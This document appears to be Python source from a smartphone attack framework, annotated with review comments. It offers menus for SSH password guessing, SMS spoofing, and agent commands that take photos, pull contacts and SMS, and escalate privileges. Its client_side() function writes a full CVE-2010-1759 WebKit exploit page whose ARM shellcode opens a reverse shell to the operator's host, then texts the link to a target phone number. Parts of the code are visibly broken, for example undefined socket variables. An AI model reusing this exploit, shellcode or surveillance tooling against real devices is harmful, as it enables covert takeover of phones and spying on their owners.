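def remote_menu():
    """Show the remote-attack menu and run the module the operator selects.

    Returns:
        0 when ``menu()`` reports choice 0, the selected module's return
        code for choices 1-4, and 1 for any other value ``menu()`` hands
        back.
    """
    menu_list = ['Direct Download Agent',
                 'Client Side Shell',
                 'USSD Webpage Attack (Safe)',
                 'USSD Webpage Attack (Malicious)'
                ]

    choice = menu(menu_list, '[*] Choose an Attack to Launch:\n')

    # Compare by value. ``is`` against an int literal only appears to work
    # because CPython caches small ints; it is an identity test, not an
    # equality test, and newer interpreters warn about it.
    if choice == 0:
        return_code = 0

    elif choice == 1:
        return_code = direct_download()

    elif choice == 2:
        return_code = client_side()

    elif choice == 3:
        # NOTE(review): entries 3 "(Safe)" and 4 "(Malicious)" both call
        # ussd() with no argument, so this dispatcher does not pass the
        # selected variant on. Confirm that ussd() asks the operator itself
        # before the "Safe" entry is relied on during an engagement.
        return_code = ussd()

    elif choice == 4:
        return_code = ussd()

#    elif choice == my_number:
#        return_code = custom_module()
# etc...

    else:
        return_code = 1

    return return_code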
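def iphone_menu():
    """Show the iPhone remote-attack menu and run the selected module.

    Returns:
        0 when ``menu()`` reports choice 0, the selected module's return
        code for choices 1-3, and 1 for any other value ``menu()`` hands
        back.
    """
    menu_list = ['Test for Default SSH Password (iPhone)',
                 'Guess SSH Password (iPhone)',
                 'Spoof Sender Address SMS (iPhone)'
                ]

    choice = menu(menu_list, '[*] Choose a Remote Attack to Launch:\n')

    # Compare by value. ``is`` against an int literal is an identity test
    # that only appears to work through CPython's small-int cache.
    if choice == 0:
        return_code = 0

    elif choice == 1:
        return_code = alpine()

    elif choice == 2:
        return_code = guess_pass()

    elif choice == 3:
        return_code = sms_sender_spoof()

#    elif choice == my_number:
#        return_code = custom_module()
# etc...

    else:
        return_code = 1

    return return_code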
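def agentcontrol_menu(key=None):
    """Show the agent-control menu and run the selected command with *key*.

    Args:
        key: Agent control key. When None the operator is prompted for it;
            an empty answer or the word "none" (any case) counts as no key.

    Returns:
        1 when no key is available or ``menu()`` returns an unlisted value,
        0 when ``menu()`` reports choice 0, otherwise the return code of the
        selected command.
    """
    if key is None:
        key = raw_input(color(33, '\n[-] Enter agent control key [None]: '))

        # raw_input() always returns a str, so lower() cannot fail here and
        # needs no catch-all handler around it.
        # NOTE(review): a key typed at the prompt is lower-cased, while a key
        # passed in by the caller is used as given. Confirm control keys are
        # case-insensitive on the agent side.
        key = key.lower()

        if key in ('', 'none', '\n'):
            key = None

    if key is None:
        print color(31, '[!] No key was provided, communicating with an agent will not work')
        print color(31, '[!] Returning...')
        return 1

    menu_list = ['Send SMS'            ,
                 'Take Picture'        ,
                 'Get Contacts'        ,
                 'Get SMS Database'    ,
                 'Privilege Escalation'
                ]

    choice = menu(menu_list, color(35, '\n[*] Agent Control Commands:\n'))

    # Compare by value. ``is`` against an int literal is an identity test
    # that only appears to work through CPython's small-int cache.
    if choice == 0:
        return_code = 0

    elif choice == 1:
        return_code = send_sms(key)

    elif choice == 2:
        return_code = take_picture(key)

    elif choice == 3:
        return_code = get_contacts(key)

    elif choice == 4:
        return_code = get_sms_database(key)

    elif choice == 5:
        return_code = privilege_escalation(key)

#    elif choice == my_number:
#        return_code = custom_module()
# etc...

    else:
        return_code = 1

    return return_code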
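def add_modem():
    """Attach a modem and register it in the MySQL database.

    The operator chooses between a USB modem on /dev/ttyUSB2 and a
    smartphone-app modem reached through ``app_connect()``.

    Returns:
        The status of the chosen path: the result of ``make_files2()`` or
        ``database_add2()`` for a USB modem, the result of ``app_connect()``
        (1 if it raised) for an app modem, and 0 for any other menu value.
        The listing this replaces computed the status in ``x`` but fell off
        the end of the function, although its own retry
        (``x = add_modem()``) reads the return value.
    """
    config  = ConfigParser.ConfigParser()
    config.read('config.cfg')

    webserver = config.get('Web', 'webroot')
    # Not used below; kept so a config file without this option still fails
    # at this point, as it did before.
    ipaddress = config.get('Web', 'ipaddress')

    modemlst = ['Search for attached modem',
                'Attach to a smartphone based app'
               ]
    x = 0

    choice = spf_core.menu(modemlst, color(35,'\nChoose a type of modem to attach to:\n'))

    if choice == 1:
        if os.path.exists('/dev/ttyUSB2'):
            print color(33,'[*] USB Modem Found\n')
            usb = serial.serialposix(port='/dev/ttyUSB2', baudrate=115200, bytesize=8, parity='N', stopbits=1)
            try:
                # ATZ resets the modem; give it a second before reading.
                usb.write("ATZ\r\n")
                sleep(1)

                line = read_modem(usb)
                print line
            finally:
                # Release the serial port even when the write or read fails,
                # so a later attempt is not locked out of the device.
                usb.close()

            path      = '/zoom'
            number    = '/dev/ttyUSB2'
            key       = 'NULL'
            modemtype = "usb"

            x = make_files2(path)

            # make_files2() signals failure with 1; only register the modem
            # when its files were created.
            if x != 1:
                x = database_add2(number,path,key,modemtype)

        else:
            print color(31,'[!] No USB Modem Found')
            # Show the menu again; each retry adds a stack frame.
            x = add_modem()

    elif choice == 2:
        try:
            x = app_connect(webserver)
        except Exception as e:
            print color(31,'[!] Error: %s' % e)
            x = 1

    return x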
def client_side():
    """Host the CVE 2010-1759 test page, text its link out, and log the result.

    Flow as written: read ``server`` and ``shellipaddress`` from the ``Web``
    config section, prompt the operator for a hosting path, file name, local
    IP address and target phone number, write the HTML page under the web
    root, send the link through the modem returned by ``get_modem()`` (AT
    commands for a USB modem, the ``getfunc`` control file for an app
    modem), bind a socket to TCP 12345 on ``shellipaddress`` and insert a
    row into the ``client`` table.

    Returns:
        0 when ``menu()`` yields 0 or "Error" and at the end of option 1;
        1 when ``get_modem()`` returns 0 or for any other menu value.
    """
    # TODO: fix a lot
    # NOTE(review): ``config`` is not defined in this function; presumably a
    # module-level ConfigParser instance. Confirm against the rest of the file.
    webserver = config.get("Web", "server")
    # ipaddress      = config.get('Web', 'ipaddress')
    shellipaddress = config.get("Web", "shellipaddress")

    cs = ["CVE 2010-1759 Webkit Vuln Android"]

    choice = menu(cs)

    if choice in (0, "Error"):
        return 0

    elif choice == 1:
        path = str(raw_input(color(33, "[-] Hosting Path: ")))
        filename = str(raw_input(color(33, "[-] Filename: ")))
        ipaddress = str(raw_input(color(33, "[-] Local IP address: ")))
        number = str(raw_input(color(33, "[-] Phone Number to Attack: ")))

        link = "http://%s%s%s" % (ipaddress, path, filename)

        # NOTE(review): ``path`` and ``filename`` are used exactly as typed and
        # pasted into command lines run through system() (mkdir, touch,
        # chmod). Shell metacharacters or ``..`` in either value act on the
        # operator's own host. Building the directory and file with os/open
        # calls on a validated path would avoid the shell entirely.
        fullpath = webserver + path
        command1 = "mkdir %s" % fullpath
        system(command1)

        # The four octets of shellipaddress feed the ``ip`` variable of the
        # generated page.
        octets = shellipaddress.split(".")

        out1 = struct.pack("b", int(octets[0]))
        hex1 = hex(out1)

        out2 = struct.pack("b", int(octets[1]))
        hex2 = hex(out2)

        out3 = struct.pack("b", int(octets[2]))
        hex3 = hex(out3)

        out4 = struct.pack("b", int(octets[3]))
        hex4 = hex(out4)

        sploitfile = "%s%s" % (fullpath, filename)
        command8 = "touch %s" % sploitfile
        system(command8)

        # NOTE(review): mode 777 leaves the served file writable and
        # executable by every local account, so any local user can change
        # what the web server hands out.
        command9 = "chmod 777 %s" % sploitfile
        system(command9)

        # NOTE(review): ``file`` shadows the builtin, and the handle is not
        # closed if writelines() raises.
        file = open(sploitfile, "w")
        # The page content is fixed apart from the ``ip`` value, so its
        # literal strings (for example the "NAN(ffffe00572c60)" argument and
        # the "Enjoy!" body) are stable indicators for web or proxy content
        # inspection.
        text = [
            "<html>\n",
            "<head>\n",
            "<script>\n",
            'var ip = unescape("\\u' + hex2 + hex1 + "\\u" + hex4 + hex3 + '");\n',
            'var port = unescape("\\u3930");\n',
            "function trigger()\n",
            "{\n",
            'var span = document.createElement("div");\n',
            'document.getElementById("BodyID").appendChild(span);\n',
            'span.innerHTML = -parseFloat("NAN(ffffe00572c60)");\n',
            "}\n",
            "function exploit()\n",
            "{\n",
            'var nop = unescape("\\u33bc\\u0057");\n',
            "do\n",
            "{\n",
            "nop+=nop;\n",
            "} while (nop.length<=0x1000);\n",
            'var scode = nop+unescape("\\u1001\\ue1a0\\u0002\\ue3a0\\u1001\\ue3a0\\u2005\\ue281\\u708c\\ue3a0\\u708d\\ue287\\u0080\\uef00\\u6000\\ue1a0\\u1084\\ue28f\\u2010\\ue3a0\\u708d\\ue3a0\\u708e\\ue287\\u0080\\uef00\\u0006\\ue1a0\\u1000\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1001\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1002\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u2001\\ue28f\\uff12\\ue12f\\u4040\\u2717\\udf80\\ua005\\ua508\\u4076\\u602e\\u1b6d\\ub420\\ub401\\u4669\\u4052\\u270b\\udf80\\u2f2f\\u732f\\u7379\\u6574\\u2f6d\\u6962\\u2f6e\\u6873\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u0002");\n',
            "scode += port;\n",
            "scode += ip;\n",
            'scode += unescape("\\u2000\\u2000");\n',
            "target = new Array();\n",
            "for(i = 0; i < 0x1000; i++)\n",
            "target[i] = scode;\n",
            "for (i = 0; i <= 0x1000; i++)\n",
            "{\n",
            'document.write(target[i]+"<i>");\n',
            "if (i>0x999)\n",
            "{\n",
            "trigger();\n",
            "}\n",
            "}\n",
            "}\n",
            "</script>\n",
            "</head>\n",
            '<body id="BodyID">\n',
            "Enjoy!\n",
            "<script>\n",
            "exploit();\n",
            "</script>\n",
            "</body>\n",
            "</html>\n",
        ]
        file.writelines(text)
        file.close()

        modem = get_modem()
        if modem == 0:
            print color(31, "\n[!] No modems found. Attach a modem to use this functionality\n")
            return 1

        # Read SQL vars from config
        # NOTE(review): the database password is read in clear text from the
        # config file, so that file's permissions are what protect it.
        sqlserver = config.get("SQL", "server")
        username = config.get("SQL", "username")
        password = config.get("SQL", "password")

        db = MySQLdb.connect(sqlserver, username, password, "framework")

        # NOTE(review): these three statements are built with string
        # formatting; ``modem`` comes from get_modem(), which is not visible
        # here. db_exec_rows() is handed only the query text, so it presumably
        # uses a module-level connection rather than the ``db`` opened above.
        pathquery = "SELECT %s from modems where id=%s" % ("path", modem)
        path2 = db_exec_rows(pathquery)

        keyquery = "SELECT %s from modems where id=%s" % ("controlkey", modem)
        key2 = db_exec_rows(keyquery)

        modemtypequery = "SELECT %s from modems where id=%s" % ("type", modem)
        modemtype2 = db_exec_rows(modemtypequery)

        # NOTE(review): both comparisons below assume db_exec_rows() returns a
        # bare string. Confirm its return shape.
        if modemtype2 == "usb":
            # Interface with USB modem
            usb = serial.serialposix(port="/dev/ttyUSB2", baudrate=115200, bytesize=8, parity="N", stopbits=1)
            usb.write("ATZ\r\n")
            sleep(1)

            line = read_modem(usb)
            print line
            sleep(1)

            usb.write("AT+CMGF=1\r\n")
            line = read_modem(usb)
            print line
            sleep(1)

            numberline = 'AT+CMGS="%s"\r\n' % number
            usb.write(numberline)
            line = read_modem(usb)
            print line
            sleep(1)

            # The SMS body is a fixed phrase followed by the link, which makes
            # it a usable signature for SMS or mobile-gateway filtering.
            msg = "This is a cool page: %s" % link
            usb.write(struct.pack("b", 26, msg))
            sleep(2)

            line = read_modem(usb)
            print line
            sleep(1)

            usb.close()

        elif modemtype2 == "app":
            # Interface with app-based modem
            # NOTE(review): the control key is written in clear text to a file
            # below the web server path. If that directory is served, anyone
            # who can request the file can read the key.
            control = "%s%s/getfunc" % (webserver, path2)
            command2 = "%s SEND %s This is a cool page: %s" % (key2, number, link)

            file = open(control, "w")
            file.write(command2)
            file.close()

        vulnerable = "no"

        # socket = new IO::Socket::INET (LocalHost => $shellipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1, Timeout=> 180);
        # NOTE(review): unfinished port of the Perl line above (see the TODO
        # at the top of the function). The socket is bound to the fixed port
        # 12345 and is not closed on any path.
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((str(shellipaddress), 12345))

        if data_socket == socket.accept():
            data = "/system/bin/id\n"

            data_socket.write(data)
            data = data_socket()

            print data
            close(data_socket)

            vulnerable = "yes"
            print color(32, "\n[+] Vulnerable: %s\n" % vulnerable)

            table = "client"
            # NOTE(review): ``db`` was already assigned as a local at the
            # connect() call above. Declaring it global after that use is
            # reported as a warning by Python 2 and rejected by Python 3.
            global db

            # NOTE(review): ``number`` is operator input wrapped in double
            # quotes by hand and formatted into the statement, so a quote in
            # the value changes the SQL. Passing the values as parameters to
            # cursor.execute() lets the driver quote them. No commit() is
            # visible, so the row may not be persisted. Confirm the
            # connection's autocommit setting.
            number2 = '"%s"' % number
            vulnerable2 = '"%s"' % vulnerable
            webkit = '"webkit"'
            insertquery = "INSERT INTO %s (id,number,exploit,vuln) VALUES (DEFAULT,%s,%s,%s)" % (
                table,
                number2,
                webkit,
                vulnerable2,
            )
            cursor = db.cursor()
            sql = cursor.execute(insertquery)
        return 0

    return 1